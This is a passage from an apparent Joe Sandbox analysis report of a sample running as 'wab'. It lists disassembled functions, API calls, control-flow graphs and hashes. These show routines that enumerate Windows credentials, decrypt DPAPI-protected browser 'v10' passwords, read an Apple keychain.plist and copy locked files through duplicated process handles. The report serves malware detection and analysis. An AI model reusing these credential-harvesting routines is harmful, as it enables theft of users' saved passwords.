                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 912665193-1740548384
                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                              Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: BIN
                                                              • API String ID: 1668488027-1015027815
                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                              Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 2947809556-0
                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 767404330-0
                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 74 445685 21->74 75 4456b2-4456b5 call 40b1ab 21->75 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 68 4458a2-4458aa call 40b1ab 53->68 69 44587e 53->69 64 445d1c-445d25 54->64 65 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->65 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 56->13 72 44582e-445847 call 40a9b5 call 4087b3 57->72 79 445fae-445fb2 64->79 80 445d2b-445d3b 64->80 160 445cf5 65->160 161 445cfc-445d03 65->161 68->19 88 445884-44589d call 40a9b5 call 4087b3 69->88 249 445c77 70->249 71->70 73 445ba2-445bcf call 4099c6 call 445403 call 445389 71->73 142 445849 72->142 73->54 92 44568b-4456a4 call 40a9b5 call 4087b3 74->92 109 4456ba-4456c4 75->109 97 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 80->97 98 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 80->98 146 44589f 88->146 148 4456a9-4456b0 92->148 166 445d67-445d6c 97->166 167 445d71-445d83 call 445093 97->167 196 445e17 98->196 197 445e1e-445e25 98->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->68 148->75 148->92 154->109 155->154 157->158 158->28 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->79 171->172 172->64 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->79 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->79 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2745753283-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                              Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                              Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 580435826-2783969131
                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 327780389-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                              Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
